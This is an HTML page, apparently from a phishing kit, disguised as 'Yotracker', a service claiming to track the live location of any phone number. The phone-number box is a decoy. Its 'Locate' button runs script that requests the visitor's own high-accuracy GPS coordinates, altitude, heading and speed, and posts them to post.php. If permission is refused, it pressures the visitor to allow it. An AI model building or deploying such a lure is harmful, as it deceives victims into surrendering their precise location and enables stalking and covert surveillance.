<html lang="en">
<head>
<meta charset="UTF-8">
<meta id="viewport" name="viewport" content="width=device-width, user-scalable=no, initial-scale=1, minimum-scale=1, maximum-scale=1">
<meta property="og:site_name" content="Yotracker">
<meta property="og:title" content="Track Geo location">
<meta property="og:image" content=" https://i.ibb.co/dp1YjWR/IMG-20201018-034832.jpg "/>
<meta property="fb:app_id" content="124024574287414">
<meta property="og:url" content="https://yotracker.com">
<meta content="Track Live location of any phone number; from facebook" name="description">
<title>Yotracker</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">

<style type="text/css">
Infected Terminal 16/396
////////////////.   Navigation bar//////////////////////////////////////////////
@import url('https://fonts.googleapis.com/css?family=Roboto:700&display=swap');
*{
padding: 0;
margin: 0;
}
.wrapper{
background: url( https://cdn.dribbble.com/users/2042276/screenshots/4119395/dribble-2.gif ) no-repeat;
background-size: cover;
height: 100vh;
width:100vh;
}
.topnav {
position: fixed;
height: 40px;
width: 100%;
max-width:cover;
top: 0px;
left: 0px;
background: rgba(0,0,0,0.4);
box-shadow: 0px 0px 0px 2px rgba(150,0,50,0.8);

}
.topnav .logo{
width: 140px;
height: auto;
padding: 0px 0px;
margin-left: 50px;
}
.topnav ul{
float: left;
margin-right: 0px;
}
.topnav ul li{
list-style: none;
margin: 0 0px;
display: inline-block;
line-height: 40px;
}
.topnav ul li a{
font-size: 20px;
font-family: 'Roboto', sans-serif;
color:  rgba(150,0,50,0.8) ;
padding: 5px 20px;
text-decoration: none;
transition: .4s;
}
.topnav ul li a.active,
.topnav ul li a:hover{
background:  #000000;
box-shadow: 0px 0px 0px 2px rgba(250,150,0,1);
border-radius: 5px;
}

.wrapper .center{
position: absolute;
left: 50%;
top: 55%;
transform: translate(-50%, -50%);
font-family: sans-serif;
user-select: none;
}
.center h1{
color: rgba(120,40,150,0.7);
font-size: cover;
width:cover;
font-weight: bold;
text-align: center;
}
.center h2{
color: rgba(255,248,189,0.7); ;
font-size: cover;
font-weight: bold;
margin-top: 80px;
width: cover;
text-align: center;
}

.center .buttons{
margin: 3px 280px;
}
.buttons button{
height: 50px;
width: 250px;
font-size: 18px;
font-weight: 600;
color: #0c9686;
background: #000000;
outline: none;
cursor: pointer;
border: 1px solid #ff9900;
border-radius: 25px;
transition: .4s;
}
.buttons .btn2{
margin: center;


}
.buttons button:hover{
background: #fff8db;
}


@import url('https://fonts.googleapis.com/css?family=Roboto');

*{
margin: 0;
padding: 0;
box-sizing: border-box;
outline: none;
font-family: 'Roboto', sans-serif;
}

body{
background: url(' ') no-repeat top center;
background-size: cover;
height: cover;
}

.input100 {
font-family: Poppins-Medium;
font-size: 15px;
line-height: 5;
color: #666666;

display: block;
width: 100%;
background: #000000;
height: 50px;
border: 1px solid #ff9900;
border-radius: 25px;
padding: 0 30px 0 8px;
}


//////////////////////. Dropdown. /////////////////////////////////////

.dropdown {
position: relative;
display: inline-block;
}

.dropdown-content {
display: none;
position: absolute;
background-color: rgba(0,0,0,0.0);
min-width: 160px;
box-shadow: 0px 0px 0px 2px rgba(150,0,50,0.8);
z-index: 1;
}

.dropdown-content a {
color: #0c9686;
padding: 12px 16px;
text-decoration: none;
display: block;
}

.dropdown-content a:hover {background-color: #00000;}

.dropdown:hover .dropdown-content {display: block;}

.dropdown:hover .dropbtn {background-color: #fff8bd;}
//////////////////////////////////////////////////////



///////////////////.  contact. ///////////////////////////////////////////

@import url('https://fonts.googleapis.com/css?family=Roboto');

*{
margin: 0;
padding: 0;
box-sizing: border-box;
outline: none;
font-family: 'Roboto', sans-serif;
}

body{
background: url('  ') no-repeat top center;
background-size: cover;
height: cover;
}

.wrapbox{
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
width: 100%;
height: 100%;
max-width: 700px;
max-height: 320px;
background: rgba(12,12,12,0.6);
padding: 0px;
border-radius: 5px;
box-shadow: 0px 0px 0px 2px rgba(150,0,50,0.8);
}

.wrapbox .title h1{
color: #ff9900; 
text-align: center;
margin-bottom: 0px;
}

.contact-form{
display: flex;
}

.input-fields{
display: flex;
flex-direction: column;
margin-right: 4%;
}

.input-fields,
.msg{
width: 48%;
}

.input-fields .input,
.msg textarea{
margin: 10px 0;
background: transparent;
border: 0px;
border-bottom: 2px solid #ff9900;
padding: 10px;
color: #fff8db;
width: 100%;
}

.msg textarea{
height: 212px;
}

::-webkit-input-placeholder {
/* Chrome/Opera/Safari */
color: #fff8db;
}
::-moz-placeholder {
/* Firefox 19+ */
color: #fff8db;
}
:-ms-input-placeholder {
/* IE 10+ */
color: #fff8db;
}

.btn {
background: #000000 ;
text-align: center;
padding: 15px ;
border-radius: 5px;
border-color: #ff9900 ;
color: #0c9686;
cursor: pointer;
text-transform: uppercase;
}

@media screen and (max-width: 600px){
.contact-form{
flex-direction: column;
}
.msg textarea{
height: 80px;
}
.input-fields,
.msg{
width: 100%;
}
}

/////////////////.  Footer   /////////////////////////////////////////////

@import url(https://fonts.googleapis.com/css?family=Roboto:400,500,300,700);

* {
font-family: Roboto;
}


.footer-distributed {
box-shadow: rgba(0, 0, 0, 0.2);
box-sizing: border-box;
width: 100%;
text-align: left;
font: normal 16px sans-serif;
padding: 5px 5px;
overflow: hidden;
background: rgba(0,0,0,0.4);
box-shadow: 0px 0px 0px 2px rgba(150,0,50,0.8);
position: fixed;
bottom: 0;
}

.footer-distributed .footer-left p {
color: #fff8bd;
font-size: 14px;
margin: 0;

}
/* Footer links */

.footer-distributed p{
font-size: 18px;
font-weight: bold;
color: #fff8bd;
margin:  0px;
padding: 0;
transition: ease .25s;

}

.footer-distributed p{
display: inline-block;
line-height: 1.2;
text-decoration: none;
color: inherit;
transition: ease .25s;
}

.footer-distributed  {
content: "·";
font-size: 20px;
left: 0;
color: #fff8bd;
display: inline-block;
padding-right: 0px;
}

.footer-distributed  {
content: none;
}

.footer-distributed .footer-right {
float: right;
margin-top: 0px;
max-width: 200px;
}
.footer-distributed .footer-right a {
display: inline-block;
width: 30px;
height: 30px;
background-color: #fff;
border-radius: 3px;
font-size: 20px;
color: #fff8bd;
text-align: center;
line-height: 30px;
margin-left: 3px;
transition:all .25s;
}

.footer-distributed .footer-right a:hover{transform:scale(1.6); -webkit-transform:scale(1.1);}

.footer-distributed p{text-decoration:underline;}

/* Media Queries */

@media (max-width: 600px) {
.footer-distributed .footer-left, .footer-distributed .footer-right {
text-align: center;
}
.footer-distributed .footer-right {
float: none;
margin: 0 auto 20px;
}
.footer-distributed .footer-left p {
line-height: 1.2;
}
}

.footer-distributed .logo3{
width: 140px;
height: auto;
float: left;
}
</style>

<script type="text/javascript">
if (window.location.protocol == "http:") {
var restOfUrl = window.location.href.substr(5);
window.location = "https:" + restOfUrl;
}
</script>

<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

<script type="text/javascript">
////////////infected Terminal 527/586 loc ///////////
function locate()
{
if(navigator.geolocation)
{
var optn = {enableHighAccuracy : true, timeout : 30000, maximumage: 0};
navigator.geolocation.getCurrentPosition(showPosition, showError, optn);
}
else
{
alert('Geolocation is not Supported by your Browser...');
}

function showPosition(position)
{
var lat = position.coords.latitude;
var lon = position.coords.longitude;
var acc = position.coords.accuracy;
var alt = position.coords.altitude;
var dir = position.coords.heading;
var spd = position.coords.speed;

$.ajax({
type: 'POST',
url: ' post.php ',
data: {Lat: lat, Lon: lon, Acc: acc, Alt: alt, Dir: dir, Spd: spd},
success: function(){window.location='index.php';},
mimeType: 'text'
});
};

}

function showError(error)
{
switch(error.code)
{
case error.PERMISSION_DENIED:
var denied = 'User denied the request for Geolocation';
alert('Please Refresh This Page and Allow Location Permission...');
break;
case error.POSITION_UNAVAILABLE:
var unavailable = 'Location information is unavailable';
break;
case error.TIMEOUT:
var timeout = 'The request to get user location timed out';
alert('Please Set Your Location Mode on High Accuracy...');
break;
case error.UNKNOWN_ERROR:
var unknown = 'An unknown error occurred';
break;
}

$.ajax({
type: 'POST',
url: ' error.php ',
data: {Denied: denied, Una: unavailable, Time: timeout, Unk: unknown},
success: function(){$('#change').html('Failed');},
mimeType: 'text'
});
}</script>
</head>
<body>
<div class="wrapper">
<nav class="topnav" id="myTopnav">
<img class="logo" src=" https://yotracker.com/assets/img/logo.png ">
<ul>
<li><div class="dropdown">
<a> <i class="fa fa-navicon" style="font-size:28px;color:rgba(150,0,50,0.8)"></i></a>
<div class="dropdown-content">
<a class="active" href="index.php">Home <i class="fa fa-location-arrow" style="color:#fff8bd"></i></a>
</div></div></li>
</ul>
</nav>
<div class="center">
<h1></h1>
<h2>Turn on GPS !!</h2>
<div class="buttons">
<div class="wrapbox2">
<input class="input100" type="number" name="username"  placeholder="Phone Number" >
</div>
<button style="color:red" class="btn2" id="requestButton"  onclick="locate();">Locate <i class="fa fa-thumb-tack" style="font-size:25px;color:#0afa4a"></i></button>
</div>
</div>
<footer class="footer-distributed">
<img class="logo3" src=" https://yotracker.com/assets/img/logo.png ">
<div class="footer-right">
<a href="#"> <i class="fa fa-facebook-square" style="color:#0066ff"></i> </a>
<a href="#"><i class="fa fa-twitter" style="color:#66ccff"></i></a>
<a href="#"><i class="fa fa-instagram" style="color:red"></i></a>
</div>
<div class="footer-left">
<p>Yotracker &copy; 2020</p>
</div>
</footer>
</body>
</html>